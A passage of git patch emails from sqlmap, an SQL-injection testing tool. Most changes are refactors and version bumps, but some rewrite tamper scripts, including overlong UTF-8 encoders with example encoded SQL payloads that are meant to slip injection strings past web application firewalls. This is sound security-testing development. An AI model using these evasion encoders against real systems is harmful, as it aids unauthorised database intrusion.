lib.core.settings import UNSAFE_DUMP_FILEPATH_REPLACEMENT from lib.core.settings import WINDOWS_RESERVED_NAMES from thirdparty.magic import magic @@ -418,7 +419,7 @@ def dbTableValues(self, tableValues): except: warnFile = True - _ = unicodeencode(re.sub(r"[^\w]", "_", unsafeSQLIdentificatorNaming(db))) + _ = unicodeencode(re.sub(r"[^\w]", UNSAFE_DUMP_FILEPATH_REPLACEMENT, unsafeSQLIdentificatorNaming(db))) dumpDbPath = os.path.join(conf.dumpPath, "%s-%s" % (_, hashlib.md5(unicodeencode(db)).hexdigest()[:8])) if not os.path.isdir(dumpDbPath): @@ -441,7 +442,7 @@ def dbTableValues(self, tableValues): dumpDbPath = tempDir - dumpFileName = os.path.join(dumpDbPath, "%s.%s" % (unsafeSQLIdentificatorNaming(table), conf.dumpFormat.lower())) + dumpFileName = os.path.join(dumpDbPath, re.sub(r'[\\/]', UNSAFE_DUMP_FILEPATH_REPLACEMENT, "%s.%s" % (unsafeSQLIdentificatorNaming(table), conf.dumpFormat.lower()))) if not checkFile(dumpFileName, False): try: openFile(dumpFileName, "w+b").close() @@ -450,9 +451,9 @@ def dbTableValues(self, tableValues): except: warnFile = True - _ = re.sub(r"[^\w]", "_", normalizeUnicode(unsafeSQLIdentificatorNaming(table))) + _ = re.sub(r"[^\w]", UNSAFE_DUMP_FILEPATH_REPLACEMENT, normalizeUnicode(unsafeSQLIdentificatorNaming(table))) if len(_) < len(table) or IS_WIN and table.upper() in WINDOWS_RESERVED_NAMES: - _ = unicodeencode(re.sub(r"[^\w]", "_", unsafeSQLIdentificatorNaming(table))) + _ = unicodeencode(re.sub(r"[^\w]", UNSAFE_DUMP_FILEPATH_REPLACEMENT, unsafeSQLIdentificatorNaming(table))) dumpFileName = os.path.join(dumpDbPath, "%s-%s.%s" % (_, hashlib.md5(unicodeencode(table)).hexdigest()[:8], conf.dumpFormat.lower())) else: dumpFileName = os.path.join(dumpDbPath, "%s.%s" % (_, conf.dumpFormat.lower())) @@ -613,7 +614,7 @@ def dbTableValues(self, tableValues): if not os.path.isdir(dumpDbPath): os.makedirs(dumpDbPath, 0755) - _ = re.sub(r"[^\w]", "_", normalizeUnicode(unsafeSQLIdentificatorNaming(column))) + _ = re.sub(r"[^\w]", UNSAFE_DUMP_FILEPATH_REPLACEMENT, normalizeUnicode(unsafeSQLIdentificatorNaming(column))) filepath = os.path.join(dumpDbPath, "%s-%d.bin" % (_, randomInt(8))) warnMsg = "writing binary ('%s') content to file '%s' " % (mimetype, filepath) logger.warn(warnMsg) diff --git a/lib/core/settings.py b/lib/core/settings.py index f0c6367c41b..d943db53c17 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.2.1" +VERSION = "1.2.2.2" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) @@ -424,6 +424,9 @@ # Maximum integer value MAX_INT = sys.maxint +# Replacement for unsafe characters in dump table filenames +UNSAFE_DUMP_FILEPATH_REPLACEMENT = '_' + # Options that need to be restored in multiple targets run mode RESTORE_MERGED_OPTIONS = ("col", "db", "dnsDomain", "privEsc", "tbl", "regexp", "string", "textOnly", "threads", "timeSec", "tmpPath", "uChar", "user") diff --git a/txt/checksum.md5 b/txt/checksum.md5 index f9cccc8c0e0..d9bf2cb80bc 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -34,7 +34,7 @@ e3a3f5218b2e52dd0afafdfc9fed2002 lib/core/agent.py 12e80071013606f01822c3823fb51054 lib/core/decorators.py 9458679feb9184f3fb1611daf1ebef63 lib/core/defaults.py a8bea09096a42a9a7feeb9d4d118ae66 lib/core/dicts.py -1a94690d60ed792ce441b6f2f4dbbef8 lib/core/dump.py +0d742fbf72bca25a3e82640616c30c9a lib/core/dump.py c8551f7696a76450e6d139409e4f06cd lib/core/enums.py cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -67ea2aee17da22379743e5dc18159f3f lib/core/settings.py +e4a29b441ac8137ce22d7113dd2b72c5 lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py From a16663f9a16cfeda622c1d70d1210540d5a9708d Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 7 Feb 2018 16:05:41 +0100 Subject: [PATCH 025/428] Minor refactoring --- lib/controller/controller.py | 5 ++--- lib/core/settings.py | 2 +- lib/request/connect.py | 3 +-- txt/checksum.md5 | 6 +++--- 4 files changed, 7 insertions(+), 9 deletions(-) diff --git a/lib/controller/controller.py b/lib/controller/controller.py index b491f3bd4b8..298fca10651 100644 --- a/lib/controller/controller.py +++ b/lib/controller/controller.py @@ -368,9 +368,8 @@ def start(): conf.data = urldecode(conf.data) if conf.data and urlencode(DEFAULT_GET_POST_DELIMITER, None) not in conf.data else conf.data else: - if targetUrl.find("?") > -1: - firstPart = targetUrl[:targetUrl.find("?")] - secondPart = targetUrl[targetUrl.find("?") + 1:] + if '?' in targetUrl: + firstPart, secondPart = targetUrl.split('?', 1) message = "Edit GET data [default: %s]: " % secondPart test = readInput(message, default=secondPart) test = _randomFillBlankFields(test) diff --git a/lib/core/settings.py b/lib/core/settings.py index d943db53c17..7de454f7f2c 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.2.2" +VERSION = "1.2.2.3" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/request/connect.py b/lib/request/connect.py index c7001371bcd..1c62fa3b040 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -479,8 +479,7 @@ class _(dict): # Get HTTP response if hasattr(conn, "redurl"): - page = (threadData.lastRedirectMsg[1] if kb.redirectChoice == REDIRECTION.NO\ - else Connect._connReadProxy(conn)) if not skipRead else None + page = (threadData.lastRedirectMsg[1] if kb.redirectChoice == REDIRECTION.NO else Connect._connReadProxy(conn)) if not skipRead else None skipLogTraffic = kb.redirectChoice == REDIRECTION.NO code = conn.redcode else: diff --git a/txt/checksum.md5 b/txt/checksum.md5 index d9bf2cb80bc..2e4cd3df54f 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -22,7 +22,7 @@ c88d66597f4aab719bde4542b0a1a6e0 extra/shutils/regressiontest.py b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py 0f581182871148b0456a691ae85b04c0 lib/controller/action.py a4605691d340fd05d4bfe7dde922da92 lib/controller/checks.py -ccd66880fc677a3c83db2a3a70d196d7 lib/controller/controller.py +f0e3f93f6a5275812e4d0c3e3a2a3701 lib/controller/controller.py a7b0c8e5a18a3abe8803999dcfc4664f lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py e3a3f5218b2e52dd0afafdfc9fed2002 lib/core/agent.py @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -e4a29b441ac8137ce22d7113dd2b72c5 lib/core/settings.py +a2aed50a1a6605d67d688b524bda5f56 lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py @@ -68,7 +68,7 @@ fb2e2f05dde98caeac6ccf3e67192177 lib/parse/configfile.py 4e60fe7c94bbfa631087ed3426df8ef0 lib/request/basicauthhandler.py eb39d5cbd69a2238e2f4ea2fde183cdb lib/request/basic.py c0cabedead14b8a23353b606672cff42 lib/request/comparison.py -a38e09038468387b20e978ce1b885018 lib/request/connect.py +b3c3b71e9d4aeaa2ece681cabefc953d lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py a1436e4e4f9b636cb8332f00b686bfd5 lib/request/httpshandler.py From 061c8da36b6208016a3091aba78b34f71ed1f5eb Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 7 Feb 2018 23:59:36 +0100 Subject: [PATCH 026/428] Proper overlongutf8.py (Issue #806) --- lib/core/settings.py | 2 +- tamper/overlongutf8.py | 5 +++-- txt/checksum.md5 | 4 ++-- 3 files changed, 6 insertions(+), 5 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 7de454f7f2c..b1db0ebccd0 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.2.3" +VERSION = "1.2.2.4" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/tamper/overlongutf8.py b/tamper/overlongutf8.py index a8a9da412b9..6fc4a9081a5 100644 --- a/tamper/overlongutf8.py +++ b/tamper/overlongutf8.py @@ -20,9 +20,10 @@ def tamper(payload, **kwargs): encoded) Reference: https://www.acunetix.com/vulnerabilities/unicode-transformation-issues/ + Reference: https://www.thecodingforums.com/threads/newbie-question-about-character-encoding-what-does-0xc0-0x8a-have-in-common-with-0xe0-0x80-0x8a.170201/ >>> tamper('SELECT FIELD FROM TABLE WHERE 2>1') - 'SELECT%C0%AAFIELD%C0%AAFROM%C0%AATABLE%C0%AAWHERE%C0%AA2%C0%BE1' + 'SELECT%C0%A0FIELD%C0%A0FROM%C0%A0TABLE%C0%A0WHERE%C0%A02%C0%BE1' """ retVal = payload @@ -37,7 +38,7 @@ def tamper(payload, **kwargs): i += 3 else: if payload[i] not in (string.ascii_letters + string.digits): - retVal += "%%C0%%%.2X" % (0x8A | ord(payload[i])) + retVal += "%%%.2X%%%.2X" % (0xc0 + (ord(payload[i]) >> 6), 0x80 + (ord(payload[i]) & 0x3f)) else: retVal += payload[i] i += 1 diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 2e4cd3df54f..8cbdc1bdac0 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -a2aed50a1a6605d67d688b524bda5f56 lib/core/settings.py +20d4b1198a1583059a993ea7864c79c4 lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py @@ -254,7 +254,7 @@ e44163d21e055805b5e55667e72f5978 tamper/modsecurityversioned.py f83a11d594fad3ed3291074c7b37b281 tamper/modsecurityzeroversioned.py abd6490408551a8c8226a32fbc2b5345 tamper/multiplespaces.py be757e4c9a6fb36af7b9a8c444fddb05 tamper/nonrecursivereplacement.py -aca15cb5474fb0a32e517ae5e940cbd0 tamper/overlongutf8.py +7de367954d124c29847c23909d82d92e tamper/overlongutf8.py bc0363e4fc04240c9f7b81e4ecce0714 tamper/percentage.py 4fa8b6c0e7573e395330bb6a405abbaf tamper/plus2concat.py 5b947c6cd78eab22ee53f5f534c532d3 tamper/plus2fnconcat.py From 5b99180ffe5d2fe0d304bd410b6eb84e6e6bcffd Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 8 Feb 2018 00:04:04 +0100 Subject: [PATCH 027/428] Update for an Issue #806 --- lib/core/settings.py | 2 +- tamper/overlongutf8.py | 3 +-- tamper/overlongutf8more.py | 42 ++++++++++++++++++++++++++++++++++++++ txt/checksum.md5 | 5 +++-- 4 files changed, 47 insertions(+), 5 deletions(-) create mode 100644 tamper/overlongutf8more.py diff --git a/lib/core/settings.py b/lib/core/settings.py index b1db0ebccd0..b3eb93948e5 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.2.4" +VERSION = "1.2.2.5" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/tamper/overlongutf8.py b/tamper/overlongutf8.py index 6fc4a9081a5..70d5ff76b40 100644 --- a/tamper/overlongutf8.py +++ b/tamper/overlongutf8.py @@ -16,8 +16,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Converts all characters in a given payload (not processing already - encoded) + Converts all (non-alphanum) characters in a given payload (not processing already encoded) Reference: https://www.acunetix.com/vulnerabilities/unicode-transformation-issues/ Reference: https://www.thecodingforums.com/threads/newbie-question-about-character-encoding-what-does-0xc0-0x8a-have-in-common-with-0xe0-0x80-0x8a.170201/ diff --git a/tamper/overlongutf8more.py b/tamper/overlongutf8more.py new file mode 100644 index 00000000000..3d8a8753c64 --- /dev/null +++ b/tamper/overlongutf8more.py @@ -0,0 +1,42 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +import string + +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.LOWEST + +def dependencies(): + pass + +def tamper(payload, **kwargs): + """ + Converts all characters in a given payload (not processing already encoded) + + Reference: https://www.acunetix.com/vulnerabilities/unicode-transformation-issues/ + Reference: https://www.thecodingforums.com/threads/newbie-question-about-character-encoding-what-does-0xc0-0x8a-have-in-common-with-0xe0-0x80-0x8a.170201/ + + >>> tamper('SELECT FIELD FROM TABLE WHERE 2>1') + '%C1%93%C1%85%C1%8C%C1%85%C1%83%C1%94%C0%A0%C1%86%C1%89%C1%85%C1%8C%C1%84%C0%A0%C1%86%C1%92%C1%8F%C1%8D%C0%A0%C1%94%C1%81%C1%82%C1%8C%C1%85%C0%A0%C1%97%C1%88%C1%85%C1%92%C1%85%C0%A0%C0%B2%C0%BE%C0%B1' + """ + + retVal = payload + + if payload: + retVal = "" + i = 0 + + while i < len(payload): + if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits: + retVal += payload[i:i + 3] + i += 3 + else: + retVal += "%%%.2X%%%.2X" % (0xc0 + (ord(payload[i]) >> 6), 0x80 + (ord(payload[i]) & 0x3f)) + i += 1 + + return retVal diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 8cbdc1bdac0..2a2a5ab74b7 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -20d4b1198a1583059a993ea7864c79c4 lib/core/settings.py +15c5a15fc1c24170aff99c32d2bae75d lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py @@ -254,7 +254,8 @@ e44163d21e055805b5e55667e72f5978 tamper/modsecurityversioned.py f83a11d594fad3ed3291074c7b37b281 tamper/modsecurityzeroversioned.py abd6490408551a8c8226a32fbc2b5345 tamper/multiplespaces.py be757e4c9a6fb36af7b9a8c444fddb05 tamper/nonrecursivereplacement.py -7de367954d124c29847c23909d82d92e tamper/overlongutf8.py +e298e486c06bb39d81f10d61a5c4ceec tamper/overlongutf8more.py +b9f698556f8333d9fa6eadaab44a77ab tamper/overlongutf8.py bc0363e4fc04240c9f7b81e4ecce0714 tamper/percentage.py 4fa8b6c0e7573e395330bb6a405abbaf tamper/plus2concat.py 5b947c6cd78eab22ee53f5f534c532d3 tamper/plus2fnconcat.py From 56a4e507e824c07ff8aca0e5d40e858db3a460ce Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 8 Feb 2018 16:49:16 +0100 Subject: [PATCH 028/428] Minor refactoring --- .github/CONTRIBUTING.md | 1 - lib/core/settings.py | 2 +- tamper/appendnullbyte.py | 4 +++- tamper/base64encode.py | 2 +- tamper/bluecoat.py | 2 +- tamper/charunicodeescape.py | 2 +- tamper/commalesslimit.py | 4 +++- tamper/commalessmid.py | 3 ++- tamper/commentbeforeparentheses.py | 2 +- tamper/concat2concatws.py | 4 +++- tamper/escapequotes.py | 2 +- tamper/informationschemacomment.py | 2 +- tamper/lowercase.py | 3 +-- tamper/modsecurityversioned.py | 4 +++- tamper/modsecurityzeroversioned.py | 4 +++- tamper/multiplespaces.py | 2 +- tamper/plus2concat.py | 6 +++-- tamper/plus2fnconcat.py | 6 +++-- tamper/randomcase.py | 2 +- txt/checksum.md5 | 36 +++++++++++++++--------------- 20 files changed, 53 insertions(+), 40 deletions(-) diff --git a/.github/CONTRIBUTING.md b/.github/CONTRIBUTING.md index 31b389e6070..2ae80685613 100644 --- a/.github/CONTRIBUTING.md +++ b/.github/CONTRIBUTING.md @@ -24,7 +24,6 @@ Many [people](https://raw.github.com/sqlmapproject/sqlmap/master/doc/THANKS.md) In order to maintain consistency and readability throughout the code, we ask that you adhere to the following instructions: * Each patch should make one logical change. -* Wrap code to 76 columns when possible. * Avoid tabbing, use four blank spaces instead. * Before you put time into a non-trivial patch, it is worth discussing it privately by [email](mailto:dev@sqlmap.org). * Do not change style on numerous files in one single pull request, we can [discuss](mailto:dev@sqlmap.org) about those before doing any major restyling, but be sure that personal preferences not having a strong support in [PEP 8](http://www.python.org/dev/peps/pep-0008/) will likely to be rejected. diff --git a/lib/core/settings.py b/lib/core/settings.py index b3eb93948e5..d86411f46a1 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.2.5" +VERSION = "1.2.2.6" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/tamper/appendnullbyte.py b/tamper/appendnullbyte.py index f7c7d42d8ca..3ea3d30b85a 100644 --- a/tamper/appendnullbyte.py +++ b/tamper/appendnullbyte.py @@ -5,12 +5,14 @@ See the file 'LICENSE' for copying permission """ +from lib.core.common import singleTimeWarnMessage +from lib.core.enums import DBMS from lib.core.enums import PRIORITY __priority__ = PRIORITY.LOWEST def dependencies(): - pass + singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.ACCESS)) def tamper(payload, **kwargs): """ diff --git a/tamper/base64encode.py b/tamper/base64encode.py index 1ff2b521823..d2057778b23 100644 --- a/tamper/base64encode.py +++ b/tamper/base64encode.py @@ -10,7 +10,7 @@ from lib.core.enums import PRIORITY from lib.core.settings import UNICODE_ENCODING -__priority__ = PRIORITY.LOWEST +__priority__ = PRIORITY.LOW def dependencies(): pass diff --git a/tamper/bluecoat.py b/tamper/bluecoat.py index 0258f698302..f0f034f39a4 100644 --- a/tamper/bluecoat.py +++ b/tamper/bluecoat.py @@ -18,7 +18,7 @@ def dependencies(): def tamper(payload, **kwargs): """ Replaces space character after SQL statement with a valid random blank character. - Afterwards replace character = with LIKE operator + Afterwards replace character '=' with operator LIKE Requirement: * Blue Coat SGOS with WAF activated as documented in diff --git a/tamper/charunicodeescape.py b/tamper/charunicodeescape.py index 913ea950b48..54c9b86d400 100644 --- a/tamper/charunicodeescape.py +++ b/tamper/charunicodeescape.py @@ -9,7 +9,7 @@ from lib.core.enums import PRIORITY -__priority__ = PRIORITY.LOWEST +__priority__ = PRIORITY.NORMAL def tamper(payload, **kwargs): """ diff --git a/tamper/commalesslimit.py b/tamper/commalesslimit.py index 636b65710b9..28f8f56af7d 100644 --- a/tamper/commalesslimit.py +++ b/tamper/commalesslimit.py @@ -7,12 +7,14 @@ import re +from lib.core.common import singleTimeWarnMessage +from lib.core.enums import DBMS from lib.core.enums import PRIORITY __priority__ = PRIORITY.HIGH def dependencies(): - pass + singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL)) def tamper(payload, **kwargs): """ diff --git a/tamper/commalessmid.py b/tamper/commalessmid.py index c0d9feaceb2..395bd03d55b 100644 --- a/tamper/commalessmid.py +++ b/tamper/commalessmid.py @@ -9,12 +9,13 @@ import re from lib.core.common import singleTimeWarnMessage +from lib.core.enums import DBMS from lib.core.enums import PRIORITY __priority__ = PRIORITY.HIGH def dependencies(): - pass + singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL)) def tamper(payload, **kwargs): """ diff --git a/tamper/commentbeforeparentheses.py b/tamper/commentbeforeparentheses.py index f736a557040..0fdc180e66a 100644 --- a/tamper/commentbeforeparentheses.py +++ b/tamper/commentbeforeparentheses.py @@ -9,7 +9,7 @@ from lib.core.enums import PRIORITY -__priority__ = PRIORITY.LOW +__priority__ = PRIORITY.NORMAL def dependencies(): pass diff --git a/tamper/concat2concatws.py b/tamper/concat2concatws.py index f59fd350972..f21dc7346d2 100644 --- a/tamper/concat2concatws.py +++ b/tamper/concat2concatws.py @@ -5,12 +5,14 @@ See the file 'LICENSE' for copying permission """ +from lib.core.common import singleTimeWarnMessage +from lib.core.enums import DBMS from lib.core.enums import PRIORITY __priority__ = PRIORITY.HIGHEST def dependencies(): - pass + singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL)) def tamper(payload, **kwargs): """ diff --git a/tamper/escapequotes.py b/tamper/escapequotes.py index df6ac57e552..f6f39ecc688 100644 --- a/tamper/escapequotes.py +++ b/tamper/escapequotes.py @@ -7,7 +7,7 @@ from lib.core.enums import PRIORITY -__priority__ = PRIORITY.LOWEST +__priority__ = PRIORITY.NORMAL def dependencies(): pass diff --git a/tamper/informationschemacomment.py b/tamper/informationschemacomment.py index 4b805d0de04..cec299ed705 100644 --- a/tamper/informationschemacomment.py +++ b/tamper/informationschemacomment.py @@ -9,7 +9,7 @@ from lib.core.enums import PRIORITY -__priority__ = PRIORITY.LOW +__priority__ = PRIORITY.NORMAL def tamper(payload, **kwargs): """ diff --git a/tamper/lowercase.py b/tamper/lowercase.py index 2d2a93e087c..0723edbdd8e 100644 --- a/tamper/lowercase.py +++ b/tamper/lowercase.py @@ -28,7 +28,6 @@ def tamper(payload, **kwargs): Notes: * Useful to bypass very weak and bespoke web application firewalls that has poorly written permissive regular expressions - * This tamper script should work against all (?) databases >>> tamper('INSERT') 'insert' @@ -37,7 +36,7 @@ def tamper(payload, **kwargs): retVal = payload if payload: - for match in re.finditer(r"[A-Za-z_]+", retVal): + for match in re.finditer(r"\b[A-Za-z_]+\b", retVal): word = match.group() if word.upper() in kb.keywords: diff --git a/tamper/modsecurityversioned.py b/tamper/modsecurityversioned.py index 808667997d1..224cd59f1ae 100644 --- a/tamper/modsecurityversioned.py +++ b/tamper/modsecurityversioned.py @@ -6,12 +6,14 @@ """ from lib.core.common import randomInt +from lib.core.common import singleTimeWarnMessage +from lib.core.enums import DBMS from lib.core.enums import PRIORITY __priority__ = PRIORITY.HIGHER def dependencies(): - pass + singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL)) def tamper(payload, **kwargs): """ diff --git a/tamper/modsecurityzeroversioned.py b/tamper/modsecurityzeroversioned.py index 77faed32f30..34ba6a0a5a4 100644 --- a/tamper/modsecurityzeroversioned.py +++ b/tamper/modsecurityzeroversioned.py @@ -5,12 +5,14 @@ See the file 'LICENSE' for copying permission """ +from lib.core.common import singleTimeWarnMessage +from lib.core.enums import DBMS from lib.core.enums import PRIORITY __priority__ = PRIORITY.HIGHER def dependencies(): - pass + singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL)) def tamper(payload, **kwargs): """ diff --git a/tamper/multiplespaces.py b/tamper/multiplespaces.py index db83866ebc7..b00a0b1b8c2 100644 --- a/tamper/multiplespaces.py +++ b/tamper/multiplespaces.py @@ -36,7 +36,7 @@ def tamper(payload, **kwargs): if payload: words = set() - for match in re.finditer(r"[A-Za-z_]+", payload): + for match in re.finditer(r"\b[A-Za-z_]+\b", payload): word = match.group() if word.upper() in kb.keywords: diff --git a/tamper/plus2concat.py b/tamper/plus2concat.py index e22d0f5905a..f26439dd1a7 100644 --- a/tamper/plus2concat.py +++ b/tamper/plus2concat.py @@ -7,13 +7,15 @@ import re +from lib.core.common import singleTimeWarnMessage from lib.core.common import zeroDepthSearch +from lib.core.enums import DBMS from lib.core.enums import PRIORITY __priority__ = PRIORITY.HIGHEST def dependencies(): - pass + singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MSSQL)) def tamper(payload, **kwargs): """ @@ -58,7 +60,7 @@ def tamper(payload, **kwargs): retVal = "%sCONCAT(%s)%s" % (retVal[:start], ''.join(chars)[start:end], retVal[end:]) else: - match = re.search(r"\((CHAR\(\d+.+CHAR\(\d+\))\)", retVal) + match = re.search(r"\((CHAR\(\d+.+\bCHAR\(\d+\))\)", retVal) if match: part = match.group(0) indexes = set(zeroDepthSearch(match.group(1), '+')) diff --git a/tamper/plus2fnconcat.py b/tamper/plus2fnconcat.py index d50805dd688..47572d2ccd5 100644 --- a/tamper/plus2fnconcat.py +++ b/tamper/plus2fnconcat.py @@ -7,13 +7,15 @@ import re +from lib.core.common import singleTimeWarnMessage from lib.core.common import zeroDepthSearch +from lib.core.enums import DBMS from lib.core.enums import PRIORITY __priority__ = PRIORITY.HIGHEST def dependencies(): - pass + singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MSSQL)) def tamper(payload, **kwargs): """ @@ -64,7 +66,7 @@ def tamper(payload, **kwargs): retVal = "%s%s%s)}%s" % (retVal[:start], "{fn CONCAT(" * count, ''.join(chars)[start:end].replace('\x01', ")},"), retVal[end:]) else: - match = re.search(r"\((CHAR\(\d+.+CHAR\(\d+\))\)", retVal) + match = re.search(r"\((CHAR\(\d+.+\bCHAR\(\d+\))\)", retVal) if match: part = match.group(0) indexes = set(zeroDepthSearch(match.group(1), '+')) diff --git a/tamper/randomcase.py b/tamper/randomcase.py index 9f89cc60801..a5fcaf97016 100644 --- a/tamper/randomcase.py +++ b/tamper/randomcase.py @@ -40,7 +40,7 @@ def tamper(payload, **kwargs): retVal = payload if payload: - for match in re.finditer(r"[A-Za-z_]+", retVal): + for match in re.finditer(r"\b[A-Za-z_]+\b", retVal): word = match.group() if word.upper() in kb.keywords: diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 2a2a5ab74b7..0ba29947853 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -15c5a15fc1c24170aff99c32d2bae75d lib/core/settings.py +99f9e29606ab1c3f48c822c77d1dc18b lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py @@ -227,39 +227,39 @@ c3cc8b7727161e64ab59f312c33b541a shell/stagers/stager.aspx_ 3e2e790c370442c3d98eaa88a3523b15 sqlmap.py 4c3b8a7daa4bff52e01d4168be0eedbe tamper/apostrophemask.py 4115a55b8aba464723d645b7d3156b6e tamper/apostrophenullencode.py -4b1024cecb00f13a4e1be78391e9cedb tamper/appendnullbyte.py -84e6ad0010ed1d9a326d51b493116256 tamper/base64encode.py +5be6e24825d34437512b9021f35ee026 